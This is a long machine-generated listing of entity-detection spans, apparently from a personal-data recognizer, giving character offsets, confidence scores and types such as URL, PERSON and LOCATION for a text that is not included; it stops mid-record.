start: 54215, end: 54222, score: 0.5, type: URL, start: 54264, end: 54271, score: 0.5, type: URL, start: 54325, end: 54332, score: 0.5, type: URL, start: 54454, end: 54461, score: 0.5, type: URL, start: 55139, end: 55146, score: 0.5, type: URL, start: 55203, end: 55210, score: 0.5, type: URL, start: 55215, end: 55226, score: 0.5, type: URL, start: 55376, end: 55388, score: 0.5, type: URL, start: 55504, end: 55516, score: 0.5, type: URL, start: 55913, end: 55920, score: 0.5, type: URL, start: 56385, end: 56397, score: 0.5, type: URL, start: 56609, end: 56623, score: 0.5, type: URL, start: 56638, end: 56650, score: 0.5, type: URL, start: 56749, end: 56756, score: 0.5, type: URL, start: 57204, end: 57216, score: 0.5, type: URL, start: 57471, end: 57485, score: 0.5, type: URL, start: 57500, end: 57512, score: 0.5, type: URL, start: 57732, end: 57739, score: 0.5, type: URL, start: 57844, end: 57851, score: 0.5, type: URL, start: 57883, end: 57890, score: 0.5, type: URL, start: 58025, end: 58032, score: 0.5, type: URL, start: 58205, end: 58214, score: 0.5, type: URL, start: 58354, end: 58362, score: 0.5, type: URL, start: 58542, end: 58549, score: 0.5, type: URL, start: 58682, end: 58694, score: 0.5, type: URL, start: 58860, end: 58867, score: 0.5, type: URL, start: 58960, end: 58969, score: 0.5, type: URL, start: 59001, end: 59008, score: 0.5, type: URL, start: 59019, end: 59031, score: 0.5, type: URL, start: 59236, end: 59245, score: 0.5, type: URL, start: 59363, end: 59370, score: 0.5, type: URL, start: 59420, end: 59427, score: 0.5, type: URL, start: 59527, end: 59534, score: 0.5, type: URL, start: 59664, end: 59675, score: 0.5, type: URL, start: 59688, end: 59695, score: 0.5, type: URL, start: 59843, end: 59854, score: 0.5, type: URL, start: 59912, end: 59919, score: 0.5, type: URL, start: 60012, end: 60019, score: 0.5, type: URL, start: 60035, end: 60042, score: 0.5, type: URL, start: 60064, end: 60071, score: 0.5, type: URL, start: 60074, end: 60081, score: 0.5, type: URL, start: 60090, end: 60097, score: 0.5, type: URL, start: 60340, end: 60347, score: 0.5, type: URL, start: 60362, end: 60373, score: 0.5, type: URL, start: 60392, end: 60399, score: 0.5, type: URL, start: 60492, end: 60499, score: 0.5, type: URL, start: 60515, end: 60522, score: 0.5, type: URL, start: 60544, end: 60551, score: 0.5, type: URL, start: 60554, end: 60561, score: 0.5, type: URL, start: 60671, end: 60693, score: 0.5, type: URL, start: 60716, end: 60723, score: 0.5, type: URL, start: 60734, end: 60746, score: 0.5, type: URL, start: 60892, end: 60899, score: 0.5, type: URL, start: 60914, end: 60921, score: 0.5, type: URL, start: 60933, end: 60940, score: 0.5, type: URL, start: 61127, end: 61133, score: 0.5, type: URL, start: 61163, end: 61170, score: 0.5, type: URL, start: 61181, end: 61193, score: 0.5, type: URL, start: 61334, end: 61340, score: 0.5, type: URL, start: 61383, end: 61390, score: 0.5, type: URL, start: 61405, end: 61412, score: 0.5, type: URL, start: 61424, end: 61431, score: 0.5, type: URL, start: 61612, end: 61623, score: 0.5, type: URL, start: 61636, end: 61643, score: 0.5, type: URL, start: 61719, end: 61726, score: 0.5, type: URL, start: 61754, end: 61761, score: 0.5, type: URL, start: 61772, end: 61784, score: 0.5, type: URL, start: 61935, end: 61946, score: 0.5, type: URL, start: 62004, end: 62011, score: 0.5, type: URL, start: 62104, end: 62111, score: 0.5, type: URL, start: 62127, end: 62134, score: 0.5, type: URL, start: 62156, end: 62163, score: 0.5, type: URL, start: 62166, end: 62173, score: 0.5, type: URL, start: 62332, end: 62340, score: 0.5, type: URL, start: 62408, end: 62416, score: 0.5, type: URL, start: 62442, end: 62449, score: 0.5, type: URL, start: 62458, end: 62466, score: 0.5, type: URL, start: 62481, end: 62488, score: 0.5, type: URL, start: 62611, end: 62619, score: 0.5, type: URL, start: 62634, end: 62641, score: 0.5, type: URL, start: 62656, end: 62668, score: 0.5, type: URL, start: 62711, end: 62723, score: 0.5, type: URL, start: 62829, end: 62839, score: 0.5, type: URL, start: 62845, end: 62852, score: 0.5, type: URL, start: 62859, end: 62866, score: 0.5, type: URL, start: 62954, end: 62962, score: 0.5, type: URL, start: 63010, end: 63017, score: 0.5, type: URL, start: 63213, end: 63220, score: 0.5, type: URL, start: 63229, end: 63237, score: 0.5, type: URL, start: 63249, end: 63256, score: 0.5, type: URL, start: 63347, end: 63359, score: 0.5, type: URL, start: 63468, end: 63476, score: 0.5, type: URL, start: 63507, end: 63514, score: 0.5, type: URL, start: 63526, end: 63533, score: 0.5, type: URL, start: 63630, end: 63642, score: 0.5, type: URL, start: 63749, end: 63757, score: 0.5, type: URL, start: 63788, end: 63795, score: 0.5, type: URL, start: 63807, end: 63814, score: 0.5, type: URL, start: 63911, end: 63923, score: 0.5, type: URL, start: 63976, end: 63983, score: 0.5, type: URL, start: 63994, end: 64006, score: 0.5, type: URL, start: 64053, end: 64061, score: 0.5, type: URL, start: 64093, end: 64100, score: 0.5, type: URL, start: 64163, end: 64175, score: 0.5, type: URL, start: 64239, end: 64246, score: 0.5, type: URL, start: 64255, end: 64263, score: 0.5, type: URL, start: 64286, end: 64293, score: 0.5, type: URL, start: 64358, end: 64370, score: 0.5, type: URL, start: 64435, end: 64442, score: 0.5, type: URL, start: 64452, end: 64460, score: 0.5, type: URL, start: 64483, end: 64490, score: 0.5, type: URL, start: 64557, end: 64569, score: 0.5, type: URL, start: 64636, end: 64643, score: 0.5, type: URL, start: 64653, end: 64661, score: 0.5, type: URL, start: 64684, end: 64691, score: 0.5, type: URL, start: 64837, end: 64850, score: 0.5, type: URL, start: 64889, end: 64897, score: 0.5, type: URL, start: 64920, end: 64927, score: 0.5, type: URL, start: 64939, end: 64946, score: 0.5, type: URL, start: 65116, end: 65128, score: 0.5, type: URL, start: 65174, end: 65182, score: 0.5, type: URL, start: 65205, end: 65212, score: 0.5, type: URL, start: 65224, end: 65231, score: 0.5, type: URL, start: 65384, end: 65396, score: 0.5, type: URL, start: 65442, end: 65450, score: 0.5, type: URL, start: 65473, end: 65480, score: 0.5, type: URL, start: 65492, end: 65499, score: 0.5, type: URL, start: 65667, end: 65675, score: 0.5, type: URL, start: 65723, end: 65730, score: 0.5, type: URL, start: 65739, end: 65747, score: 0.5, type: URL, start: 65762, end: 65769, score: 0.5, type: URL, start: 65797, end: 65804, score: 0.5, type: URL, start: 65959, end: 65969, score: 0.5, type: URL, start: 65975, end: 65982, score: 0.5, type: URL, start: 65989, end: 65996, score: 0.5, type: URL, start: 66074, end: 66082, score: 0.5, type: URL, start: 66213, end: 66220, score: 0.5, type: URL, start: 66307, end: 66314, score: 0.5, type: URL, start: 66359, end: 66366, score: 0.5, type: URL, start: 66545, end: 66558, score: 0.5, type: URL, start: 66611, end: 66623, score: 0.5, type: URL, start: 66657, end: 66664, score: 0.5, type: URL, start: 66725, end: 66735, score: 0.5, type: URL, start: 66741, end: 66748, score: 0.5, type: URL, start: 66755, end: 66762, score: 0.5, type: URL, start: 66840, end: 66848, score: 0.5, type: URL, start: 66986, end: 66993, score: 0.5, type: URL, start: 67090, end: 67105, score: 0.5, type: URL, start: 67127, end: 67134, score: 0.5, type: URL, start: 67143, end: 67150, score: 0.5, type: URL, start: 67341, end: 67348, score: 0.5, type: URL, start: 67409, end: 67419, score: 0.5, type: URL, start: 67425, end: 67432, score: 0.5, type: URL, start: 67439, end: 67446, score: 0.5, type: URL, start: 67524, end: 67531, score: 0.5, type: URL, start: 67595, end: 67603, score: 0.5, type: URL, start: 67727, end: 67734, score: 0.5, type: URL, start: 67821, end: 67828, score: 0.5, type: URL, start: 68008, end: 68020, score: 0.5, type: URL, start: 68097, end: 68104, score: 0.5, type: URL, start: 68138, end: 68148, score: 0.5, type: URL, start: 68154, end: 68161, score: 0.5, type: URL, start: 68168, end: 68175, score: 0.5, type: URL, start: 68253, end: 68260, score: 0.5, type: URL, start: 68271, end: 68283, score: 0.5, type: URL, start: 68330, end: 68338, score: 0.5, type: URL, start: 68462, end: 68469, score: 0.5, type: URL, start: 68685, end: 68693, score: 0.5, type: URL, start: 68946, end: 68954, score: 0.5, type: URL, start: 68969, end: 68976, score: 0.5, type: URL, start: 69040, end: 69052, score: 0.5, type: URL, start: 69064, end: 69071, score: 0.5, type: URL, start: 69697, end: 69704, score: 0.5, type: URL, start: 69709, end: 69731, score: 0.5, type: URL, start: 69797, end: 69804, score: 0.5, type: URL, start: 69821, end: 69830, score: 0.5, type: URL, start: 69979, end: 69986, score: 0.5, type: URL, start: 70031, end: 70038, score: 0.5, type: URL, start: 70068, end: 70075, score: 0.5, type: URL, start: 70118, end: 70128, score: 0.5, type: URL, start: 70151, end: 70158, score: 0.5, type: URL, start: 70165, end: 70172, score: 0.5, type: URL, start: 70230, end: 70238, score: 0.5, type: URL, start: 70283, end: 70290, score: 0.5, type: URL, start: 70312, end: 70319, score: 0.5, type: URL, start: 70322, end: 70329, score: 0.5, type: URL, start: 70405, end: 70412, score: 0.5, type: URL, start: 70427, end: 70434, score: 0.5, type: URL, start: 70617, end: 70624, score: 0.5, type: URL, start: 70664, end: 70671, score: 0.5, type: URL, start: 70678, end: 70685, score: 0.5, type: URL, start: 70779, end: 70786, score: 0.5, type: URL, start: 70793, end: 70800, score: 0.5, type: URL, start: 70889, end: 70896, score: 0.5, type: URL, start: 70901, end: 70923, score: 0.5, type: URL, start: 70989, end: 70996, score: 0.5, type: URL, start: 71013, end: 71022, score: 0.5, type: URL, start: 71225, end: 71232, score: 0.5, type: URL, start: 71272, end: 71279, score: 0.5, type: URL, start: 71324, end: 71331, score: 0.5, type: URL, start: 71361, end: 71368, score: 0.5, type: URL, start: 71411, end: 71421, score: 0.5, type: URL, start: 71444, end: 71451, score: 0.5, type: URL, start: 71458, end: 71465, score: 0.5, type: URL, start: 71512, end: 71519, score: 0.5, type: URL, start: 71530, end: 71542, score: 0.5, type: URL, start: 71591, end: 71599, score: 0.5, type: URL, start: 71675, end: 71682, score: 0.5, type: URL, start: 71704, end: 71711, score: 0.5, type: URL, start: 71714, end: 71721, score: 0.5, type: URL, start: 71791, end: 71798, score: 0.5, type: URL, start: 71803, end: 71825, score: 0.5, type: URL, start: 71891, end: 71898, score: 0.5, type: URL, start: 71915, end: 71924, score: 0.5, type: URL, start: 72079, end: 72086, score: 0.5, type: URL, start: 72163, end: 72170, score: 0.5, type: URL, start: 72213, end: 72223, score: 0.5, type: URL, start: 72246, end: 72253, score: 0.5, type: URL, start: 72260, end: 72267, score: 0.5, type: URL, start: 72325, end: 72333, score: 0.5, type: URL, start: 72395, end: 72402, score: 0.5, type: URL, start: 72469, end: 72476, score: 0.5, type: URL, start: 72486, end: 72495, score: 0.5, type: URL, start: 72519, end: 72526, score: 0.5, type: URL, start: 72531, end: 72553, score: 0.5, type: URL, start: 72619, end: 72626, score: 0.5, type: URL, start: 72643, end: 72652, score: 0.5, type: URL, start: 72815, end: 72822, score: 0.5, type: URL, start: 72897, end: 72904, score: 0.5, type: URL, start: 72947, end: 72957, score: 0.5, type: URL, start: 72980, end: 72987, score: 0.5, type: URL, start: 72994, end: 73001, score: 0.5, type: URL, start: 73059, end: 73067, score: 0.5, type: URL, start: 73129, end: 73136, score: 0.5, type: URL, start: 73203, end: 73210, score: 0.5, type: URL, start: 73220, end: 73229, score: 0.5, type: URL, start: 73253, end: 73260, score: 0.5, type: URL, start: 73265, end: 73287, score: 0.5, type: URL, start: 73353, end: 73360, score: 0.5, type: URL, start: 73377, end: 73386, score: 0.5, type: URL, start: 73598, end: 73605, score: 0.5, type: URL, start: 73680, end: 73687, score: 0.5, type: URL, start: 73730, end: 73740, score: 0.5, type: URL, start: 73763, end: 73770, score: 0.5, type: URL, start: 73777, end: 73784, score: 0.5, type: URL, start: 73842, end: 73850, score: 0.5, type: URL, start: 73912, end: 73919, score: 0.5, type: URL, start: 73986, end: 73993, score: 0.5, type: URL, start: 74003, end: 74012, score: 0.5, type: URL, start: 74033, end: 74040, score: 0.5, type: URL, start: 74093, end: 74100, score: 0.5, type: URL, start: 74151, end: 74158, score: 0.5, type: URL, start: 74207, end: 74214, score: 0.5, type: URL, start: 74266, end: 74273, score: 0.5, type: URL, start: 74325, end: 74332, score: 0.5, type: URL, start: 74598, end: 74604, score: 0.5, type: URL, start: 74699, end: 74711, score: 0.5, type: URL, start: 74857, end: 74864, score: 0.5, type: URL, start: 74907, end: 74913, score: 0.5, type: URL, start: 75138, end: 75144, score: 0.5, type: URL, start: 75289, end: 75296, score: 0.5, type: URL, start: 75339, end: 75345, score: 0.5, type: URL, start: 1644, end: 1701, score: 0.95, type: DATE_TIME, start: 38, end: 42, score: 0.85, type: NRP, start: 1064, end: 1072, score: 0.85, type: PERSON, start: 1256, end: 1293, score: 0.85, type: PERSON, start: 1644, end: 1700, score: 0.85, type: PERSON, start: 1744, end: 1752, score: 0.85, type: DATE_TIME, start: 3376, end: 3379, score: 0.85, type: DATE_TIME, start: 3420, end: 3424, score: 0.85, type: LOCATION, start: 4172, end: 4178, score: 0.85, type: PERSON, start: 4513, end: 4517, score: 0.85, type: LOCATION, start: 4777, end: 4811, score: 0.85, type: LOCATION, start: 5556, end: 5565, score: 0.85, type: PERSON, start: 5567, end: 5577, score: 0.85, type: DATE_TIME, start: 6038, end: 6071, score: 0.85, type: LOCATION, start: 7767, end: 7773, score: 0.85, type: PERSON, start: 7942, end: 7954, score: 0.85, type: PERSON, start: 9050, end: 9055, score: 0.85, type: PERSON, start: 9640, end: 9645, score: 0.85, type: PERSON, start: 11416, end: 11455, score: 0.85, type: PERSON, start: 11914, end: 11924, score: 0.85, type: PERSON, start: 12242, end: 12252, score: 0.85, type: PERSON, start: 13415, end: 13449, score: 0.85, type: PERSON, start: 13963, end: 13980, score: 0.85, type: PERSON, start: 14003, end: 14014, score: 0.85, type: LOCATION, start: 14062, end: 14071, score: 0.85, type: LOCATION, start: 14128, end: 14137, score: 0.85, type: LOCATION, start: 14193, end: 14202, score: 0.85, type: PERSON, start: 14367, end: 14374, score: 0.85, type: LOCATION, start: 14686, end: 14688, score: 0.85, type: PERSON, start: 14690, end: 14695, score: 0.85, type: PERSON, start: 14886, end: 14903, score: 0.85, type: LOCATION, start: 15412, end: 15429, score: 0.85, type: LOCATION, start: 15541, end: 15558, score: 0.85, type: LOCATION, start: 15670, end: 15687, score: 0.85, type: LOCATION, start: 15706, end: 15717, score: 0.85, type: LOCATION, start: 15801, end: 15818, score: 0.85, type: LOCATION, start: 15926, end: 15943, score: 0.85, type: LOCATION, start: 16051, end: 16068, score: 0.85, type: PERSON, start: 16199, end: 16209, score: 0.85, type: DATE_TIME, start: 16695, end: 16719, score: 0.85, type: PERSON, start: 16889, end: 16894, score: 0.85, type: PERSON, start: 17443, end: 17448, score: 0.85, type: PERSON, start: 18930, end: 18934, score: 0.85, type: PERSON, start: 19315, end: 19345, score: 0.85, type: PERSON, start: 19838, end: 19862, score: 0.85, type: PERSON, start: 20196, end: 20220, score: 0.85, type: LOCATION, start: 20544, end: 20573, score: 0.85, type: PERSON, start: 21319, end: 21359, score: 0.85, type: PERSON, start: 21578, end: 21635, score: 0.85, type: PERSON, start: 21984, end: 22036, score: 0.85, type: PERSON, start: 22091, end: 22143, score: 0.85, type: LOCATION, start: 22200, end: 22232, score: 0.85, type: PERSON, start: 22234, end: 22241, score: 0.85, type: PERSON, start: 22289, end: 22296, score: 0.85, type: PERSON, start: 22796, end: 22817, score: 0.85, type: LOCATION, start: 23508, end: 23534, score: 0.85, type: LOCATION, start: 24908, end: 24916, score: 0.85, type: PERSON, start: 24918, end: 24931, score: 0.85, type: LOCATION, start: 25124, end: 25133, score: 0.85, type: URL, start: 26456, end: 26466, score: 0.85, type: PERSON, start: 26544, end: 26558, score: 0.85, type: LOCATION, start: 26676, end: 26690, score: 0.85, type: PERSON, start: 26984, end: 26998, score: 0.85, type: URL, start: 27015, end: 27024, score: 0.85, type: LOCATION, start: 27140, end: 27144, score: 0.85, type: PERSON, start: 27273, end: 27282, score: 0.85, type: PERSON, start: 27489, end: 27500, score: 0.85, type: URL, start: 27854, end: 27864, score: 0.85, type: PERSON, start: 30067, end: 30081, score: 0.85, type: PERSON, start: 30848, end: 30856, score: 0.85, type: PERSON, start: 31363, end: 31374, score: 0.85, type: PERSON, start: 32492, end: 32524, score: 0.85, type: PERSON, start: 32627, end: 32645, score: 0.85, type: PERSON, start: 33544, end: 33577, score: 0.85, type: PERSON, start: 34020, end: 34031, score: 0.85, type: PERSON, start: 34048, end: 34056, score: 0.85, type: PERSON, start: 35690, end: 35697, score: 0.85, type: PERSON, start: 35783, end: 35790, score: 0.85, type: LOCATION, start: 36021, end: 36029, score: 0.85, type: URL, start: 12733, end: 12756, score: 0.6, type: URL, start: 16325, end: 16348, score: 0.6, type: URL, start: 28598, end: 28654, score: 0.6, type: URL, start: 31785, end: 31809, score: 0.6, type: URL, start: 700, end: 706, score: 0.5, type: URL, start: 732, end: 738, score: 0.5, type: URL, start: 1204, end: 1210, score: 0.5, type: URL, start: 1220, end: 1230, score: 0.5, type: URL, start: 1256, end: 1262, score: 0.5, type: URL, start: 1272, end: 1282, score: 0.5, type: URL, start: 1349, end: 1359, score: 0.5, type: URL, start: 1402, end: 1412, score: 0.5, type: URL, start: 1463, end: 1473, score: 0.5, type: URL, start: 1515, end: 1525, score: 0.5, type: URL, start: 1540, end: 1549, score: 0.5, type: URL, start: 1561, end: 1571, score: 0.5, type: URL, start: 1613, end: 1623, score: 0.5, type: URL, start: 2206, end: 2214, score: 0.5, type: URL, start: 2352, end: 2362, score: 0.5, type: URL, start: 2779, end: 2789, score: 0.5, type: URL, start: 2861, end: 2871, score: 0.5, type: URL, start: 2939, end: 2949, score: 0.5, type: URL, start: 3004, end: 3013, score: 0.5, type: URL, start: 3112, end: 3120, score: 0.5, type: URL, start: 3233, end: 3243, score: 0.5, type: URL, start: 3710, end: 3720, score: 0.5, type: URL, start: 3860, end: 3870, score: 0.5, type: URL, start: 3938, end: 3948, score: 0.5, type: URL, start: 4014, end: 4024, score: 0.5, type: URL, start: 4091, end: 4101, score: 0.5, type: URL, start: 4198, end: 4208, score: 0.5, type: URL, start: 4417, end: 4426, score: 0.5, type: URL, start: 4478, end: 4488, score: 0.5, type: URL, start: 4618, end: 4628, score: 0.5, type: URL, start: 4740, end: 4749, score: 0.5, type: URL, start: 4943, end: 4953, score: 0.5, type: URL, start: 5024, end: 5029, score: 0.5, type: URL, start: 5064, end: 5073, score: 0.5, type: URL, start: 5101, end: 5110, score: 0.5, type: URL, start: 5216, end: 5225, score: 0.5, type: URL, start: 5231, end: 5241, score: 0.5, type: URL, start: 5322, end: 5331, score: 0.5, type: URL, start: 5642, end: 5652, score: 0.5, type: URL, start: 5709, end: 5716, score: 0.5, type: URL, start: 5771, end: 5778, score: 0.5, type: URL, start: 5846, end: 5853, score: 0.5, type: URL, start: 5930, end: 5940, score: 0.5, type: URL, start: 5985, end: 5992, score: 0.5, type: URL, start: 6131, end: 6138, score: 0.5, type: URL, start: 6161, end: 6181, score: 0.5, type: URL, start: 6216, end: 6226, score: 0.5, type: URL, start: 6391, end: 6399, score: 0.5, type: URL, start: 6461, end: 6471, score: 0.5, type: URL, start: 6505, end: 6514, score: 0.5, type: URL, start: 6541, end: 6550, score: 0.5, type: URL, start: 6850, end: 6856, score: 0.5, type: URL, start: 6965, end: 6975, score: 0.5, type: URL, start: 7299, end: 7309, score: 0.5, type: URL, start: 7560, end: 7569, score: 0.5, type: URL, start: 7957, end: 7967, score: 0.5, type: URL, start: 8013, end: 8023, score: 0.5, type: URL, start: 8075, end: 8084, score: 0.5, type: URL, start: 8187, end: 8196, score: 0.5, type: URL, start: 10552, end: 10562, score: 0.5, type: URL, start: 10639, end: 10646, score: 0.5, type: URL, start: 10779, end: 10788, score: 0.5, type: URL, start: 10985, end: 10995, score: 0.5, type: URL, start: 11009, end: 11019, score: 0.5, type: URL, start: 11085, end: 11095, score: 0.5, type: URL, start: 11128, end: 11138, score: 0.5, type: URL, start: 11142, end: 11147, score: 0.5, type: URL, start: 11183, end: 11192, score: 0.5, type: URL, start: 11198, end: 11203, score: 0.5, type: URL, start: 11236, end: 11245, score: 0.5, type: URL, start: 11498, end: 11508, score: 0.5, type: URL, start: 11511, end: 11521, score: 0.5, type: URL, start: 12036, end: 12048, score: 0.5, type: URL, start: 12106, end: 12116, score: 0.5, type: URL, start: 12159, end: 12171, score: 0.5, type: URL, start: 12223, end: 12234, score: 0.5, type: URL, start: 12260, end: 12271, score: 0.5, type: URL, start: 12427, end: 12433, score: 0.5, type: URL, start: 12452, end: 12457, score: 0.5, type: URL, start: 12485, end: 12491, score: 0.5, type: URL, start: 12510, end: 12515, score: 0.5, type: URL, start: 12565, end: 12571, score: 0.5, type: URL, start: 12588, end: 12594, score: 0.5, type: URL, start: 12641, end: 12649, score: 0.5, type: URL, start: 13346, end: 13355, score: 0.5, type: URL, start: 13427, end: 13437, score: 0.5, type: URL, start: 13471, end: 13480, score: 0.5, type: URL, start: 13753, end: 13763, score: 0.5, type: URL, start: 13820, end: 13826, score: 0.5, type: URL, start: 13841, end: 13847, score: 0.5, type: URL, start: 13948, end: 13957, score: 0.5, type: URL, start: 14840, end: 14850, score: 0.5, type: URL, start: 14906, end: 14916, score: 0.5, type: URL, start: 14949, end: 14955, score: 0.5, type: URL, start: 14971, end: 14981, score: 0.5, type: URL, start: 15004, end: 15010, score: 0.5, type: URL, start: 16354, end: 16362, score: 0.5, type: URL, start: 16407, end: 16417, score: 0.5, type: URL, start: 16509, end: 16519, score: 0.5, type: URL, start: 16544, end: 16555, score: 0.5, type: URL, start: 16764, end: 16774, score: 0.5, type: URL, start: 16866, end: 16876, score: 0.5, type: URL, start: 16948, end: 16957, score: 0.5, type: URL, start: 17317, end: 17327, score: 0.5, type: URL, start: 17420, end: 17430, score: 0.5, type: URL, start: 17543, end: 17550, score: 0.5, type: URL, start: 17906, end: 17916, score: 0.5, type: URL, start: 17975, end: 17985, score: 0.5, type: URL, start: 18030, end: 18040, score: 0.5, type: URL, start: 18190, end: 18200, score: 0.5, type: URL, start: 18273, end: 18281, score: 0.5, type: URL, start: 18581, end: 18587, score: 0.5, type: URL, start: 18670, end: 18676, score: 0.5, type: URL, start: 18694, end: 18700, score: 0.5, type: URL, start: 18786, end: 18795, score: 0.5, type: URL, start: 19053, end: 19063, score: 0.5, type: URL, start: 19106, end: 19115, score: 0.5, type: URL, start: 19315, end: 19322, score: 0.5, type: URL, start: 19325, end: 19335, score: 0.5, type: URL, start: 19384, end: 19393, score: 0.5, type: URL, start: 21223, end: 21232, score: 0.5, type: URL, start: 21339, end: 21349, score: 0.5, type: URL, start: 21663, end: 21673, score: 0.5, type: URL, start: 21723, end: 21732, score: 0.5, type: URL, start: 21856, end: 21865, score: 0.5, type: URL, start: 21885, end: 21895, score: 0.5, type: URL, start: 22265, end: 22275, score: 0.5, type: URL, start: 22325, end: 22334, score: 0.5, type: URL, start: 22362, end: 22371, score: 0.5, type: URL, start: 22881, end: 22885, score: 0.5, type: URL, start: 22905, end: 22909, score: 0.5, type: URL, start: 23052, end: 23060, score: 0.5, type: URL, start: 24191, end: 24200, score: 0.5, type: URL, start: 24209, end: 24219, score: 0.5, type: URL, start: 24380, end: 24386, score: 0.5, type: URL, start: 24539, end: 24544, score: 0.5, type: URL, start: 24574, end: 24584, score: 0.5, type: URL, start: 24679, end: 24689, score: 0.5, type: URL, start: 24770, end: 24780, score: 0.5, type: URL, start: 24824, end: 24834, score: 0.5, type: URL, start: 24875, end: 24884, score: 0.5, type: URL, start: 25042, end: 25052, score: 0.5, type: URL, start: 25072, end: 25080, score: 0.5, type: URL, start: 25145, end: 25156, score: 0.5, type: URL, start: 25219, end: 25230, score: 0.5, type: URL, start: 25260, end: 25269, score: 0.5, type: URL, start: 25290, end: 25298, score: 0.5, type: URL, start: 25337, end: 25348, score: 0.5, type: URL, start: 25386, end: 25396, score: 0.5, type: URL, start: 25443, end: 25448, score: 0.5, type: URL, start: 25522, end: 25532, score: 0.5, type: URL, start: 25578, end: 25588, score: 0.5, type: URL, start: 25815, end: 25824, score: 0.5, type: URL, start: 25944, end: 25953, score: 0.5, type: URL, start: 25959, end: 25964, score: 0.5, type: URL, start: 25996, end: 26005, score: 0.5, type: URL, start: 26311, end: 26318, score: 0.5, type: URL, start: 26386, end: 26393, score: 0.5, type: URL, start: 26408, end: 26415, score: 0.5, type: URL, start: 26486, end: 26496, score: 0.5, type: URL, start: 26577, end: 26586, score: 0.5, type: URL, start: 26618, end: 26627, score: 0.5, type: URL, start: 26659, end: 26668, score: 0.5, type: URL, start: 26694, end: 26703, score: 0.5, type: URL, start: 26845, end: 26854, score: 0.5, type: URL, start: 26872, end: 26881, score: 0.5, type: URL, start: 26900, end: 26909, score: 0.5, type: URL, start: 27184, end: 27194, score: 0.5, type: URL, start: 27219, end: 27228, score: 0.5, type: URL, start: 27461, end: 27471, score: 0.5, type: URL, start: 27503, end: 27508, score: 0.5, type: URL, start: 27669, end: 27679, score: 0.5, type: URL, start: 27998, end: 28007, score: 0.5, type: URL, start: 28974, end: 28983, score: 0.5, type: URL, start: 29000, end: 29012, score: 0.5, type: URL, start: 29465, end: 29473, score: 0.5, type: URL, start: 29906, end: 29915, score: 0.5, type: URL, start: 29990, end: 30001, score: 0.5, type: URL, start: 30037, end: 30046, score: 0.5, type: URL, start: 30122, end: 30131, score: 0.5, type: URL, start: 30208, end: 30217, score: 0.5, type: URL, start: 30302, end: 30311, score: 0.5, type: URL, start: 30404, end: 30413, score: 0.5, type: URL, start: 30506, end: 30515, score: 0.5, type: URL, start: 30656, end: 30665, score: 0.5, type: URL, start: 30754, end: 30763, score: 0.5, type: URL, start: 30873, end: 30882, score: 0.5, type: URL, start: 30983, end: 30992, score: 0.5, type: URL, start: 31119, end: 31128, score: 0.5, type: URL, start: 31381, end: 31387, score: 0.5, type: URL, start: 31422, end: 31436, score: 0.5, type: URL, start: 31516, end: 31525, score: 0.5, type: URL, start: 31597, end: 31606, score: 0.5, type: URL, start: 31624, end: 31634, score: 0.5, type: URL, start: 32138, end: 32146, score: 0.5, type: URL, start: 32164, end: 32174, score: 0.5, type: URL, start: 32205, end: 32214, score: 0.5, type: URL, start: 32288, end: 32298, score: 0.5, type: URL, start: 32344, end: 32354, score: 0.5, type: URL, start: 32393, end: 32403, score: 0.5, type: URL, start: 32504, end: 32514, score: 0.5, type: URL, start: 32568, end: 32578, score: 0.5, type: URL, start: 32636, end: 32644, score: 0.5, type: URL, start: 32670, end: 32680, score: 0.5, type: URL, start: 32707, end: 32717, score: 0.5, type: URL, start: 32741, end: 32751, score: 0.5, type: URL, start: 33116, end: 33126, score: 0.5, type: URL, start: 33210, end: 33228, score: 0.5, type: URL, start: 33245, end: 33254, score: 0.5, type: URL, start: 33317, end: 33326, score: 0.5, type: URL, start: 33390, end: 33399, score: 0.5, type: URL, start: 33461, end: 33471, score: 0.5, type: URL, start: 33753, end: 33762, score: 0.5, type: URL, start: 33765, end: 33775, score: 0.5, type: URL, start: 33845, end: 33855, score: 0.5, type: URL, start: 34092, end: 34100, score: 0.5, type: URL, start: 34136, end: 34149, score: 0.5, type: URL, start: 34192, end: 34196, score: 0.5, type: URL, start: 34232, end: 34239, score: 0.5, type: URL, start: 34275, end: 34292, score: 0.5, type: URL, start: 34328, end: 34335, score: 0.5, type: URL, start: 34415, end: 34425, score: 0.5, type: URL, start: 34490, end: 34499, score: 0.5, type: URL, start: 34563, end: 34573, score: 0.5, type: URL, start: 34624, end: 34633, score: 0.5, type: URL, start: 34675, end: 34684, score: 0.5, type: URL, start: 34691, end: 34701, score: 0.5, type: URL, start: 34770, end: 34780, score: 0.5, type: URL, start: 34887, end: 34897, score: 0.5, type: URL, start: 34938, end: 34948, score: 0.5, type: URL, start: 35700, end: 35710, score: 0.5, type: URL, start: 35761, end: 35773, score: 0.5, type: URL, start: 35859, end: 35869, score: 0.5, type: URL, start: 36237, end: 36243, score: 0.5, type: URL, start: 36293, end: 36302, score: 0.5, type: EMAIL_ADDRESS, start: 48, end: 63, score: 1.0, type: DATE_TIME, start: 31, end: 35, score: 0.85, type: PERSON, start: 36, end: 47, score: 0.85, type: LOCATION, start: 929, end: 936, score: 0.85, type: PERSON, start: 959, end: 966, score: 0.85, type: PERSON, start: 2384, end: 2397, score: 0.85, type: PERSON, start: 3348, end: 3353, score: 0.85, type: PERSON, start: 6107, end: 6112, score: 0.85, type: PERSON, start: 8179, end: 8184, score: 0.85, type: PERSON, start: 8508, end: 8513, score: 0.85, type: PERSON, start: 11209, end: 11214, score: 0.85, type: PERSON, start: 13406, end: 13411, score: 0.85, type: PERSON, start: 13549, end: 13571, score: 0.85, type: DATE_TIME, start: 16412, end: 16429, score: 0.85, type: DATE_TIME, start: 16455, end: 16472, score: 0.85, type: DATE_TIME, start: 17249, end: 17266, score: 0.85, type: DATE_TIME, start: 17292, end: 17309, score: 0.85, type: NRP, start: 19243, end: 19281, score: 0.85, type: DATE_TIME, start: 20530, end: 20547, score: 0.85, type: DATE_TIME, start: 20573, end: 20590, score: 0.85, type: PERSON, start: 20896, end: 20934, score: 0.85, type: DATE_TIME, start: 21426, end: 21443, score: 0.85, type: DATE_TIME, start: 21469, end: 21486, score: 0.85, type: LOCATION, start: 21723, end: 21758, score: 0.85, type: LOCATION, start: 22336, end: 22371, score: 0.85, type: LOCATION, start: 23273, end: 23308, score: 0.85, type: DATE_TIME, start: 24760, end: 24777, score: 0.85, type: DATE_TIME, start: 24803, end: 24820, score: 0.85, type: LOCATION, start: 25165, end: 25200, score: 0.85, type: DATE_TIME, start: 25783, end: 25800, score: 0.85, type: DATE_TIME, start: 25826, end: 25843, score: 0.85, type: PERSON, start: 26171, end: 26209, score: 0.85, type: DATE_TIME, start: 26830, end: 26847, score: 0.85, 